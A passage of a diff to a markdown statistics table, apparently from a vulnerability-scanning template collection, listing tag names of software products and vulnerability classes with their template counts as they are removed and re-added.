1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| natemail | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| ognl | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| pmb | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| exponentcms | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| lotus | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| graphite | 1 | | | | | | | | | -| eg | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| sql | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| daybyday | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| terraform | 1 | | | | | | | | | -| gunicorn | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| glowroot | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| gitea | 1 | | | | | | | | | -| mrtg | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| owasp | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| gstorage | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| websphere | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| s3 | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| kindeditor | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| bazarr | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| database | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| sar2html | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| iceflow | 1 | | | | | | | | | -| announcekit | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| cockpit | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| tjws | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| gsoap | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| maxsite | 1 | | | | | | | | | -| graylog | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| logontracer | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| artica | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| shoretel | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| elasticsearch | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| gilacms | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| listserv | 1 | | | | | | | | | -| tidb | 1 | | | | | | | | | -| clockwork | 1 | | | | | | | | | -| netmask | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| rocketchat | 1 | | | | | | | | | -| couchbase | 1 | | | | | | | | | -| phpwiki | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| netgenie | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| asus | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| craftcms | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| graphql | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| metabase | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| dbeaver | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| nifi | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| omi | 1 | | | | | | | | | -| cherokee | 1 | | | | | | | | | -| tectuus | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| smartblog | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| jaspersoft | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| burp | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| qdpm | 1 | | | | | | | | | -| actuator | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| ecoa | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| solarlog | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| elfinder | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| phpfastcache | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| meraki | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | +| voipmonitor | 2 | | | | | | | | | +| nagios | 2 | | | | | | | | | +| globalprotect | 2 | | | | | | | | | +| trixbox | 2 | | | | | | | | | +| hashicorp | 2 | | | | | | | | | +| rockmongo | 2 | | | | | | | | | +| mcafee | 2 | | | | | | | | | +| vrealize | 2 | | | | | | | | | | thinkadmin | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| myvuehelp | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | | codemeter | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| tidb | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | | adb | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| karel | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| vcenter | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| elfinder | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| chyrp | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| lotus | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | | cgi | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| commax | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| s3 | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | | gogs | 1 | | | | | | | | | | eyou | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| azkaban | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| tor | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| redmine | 1 | | | | | | | | | -| trane | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| processmaker | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| frontpage | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| chyrp | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| cofax | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | | memcached | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| pcoip | 1 | | | | | | | | | -| clickhouse | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| openemr | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | | tcexam | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| eyelock | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| xampp | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | | basic-auth | 1 | | | | | | | | | -| minimouse | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | | chinaunicom | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| rockethchat | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| rocketchat | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| zte | 1 | | | | 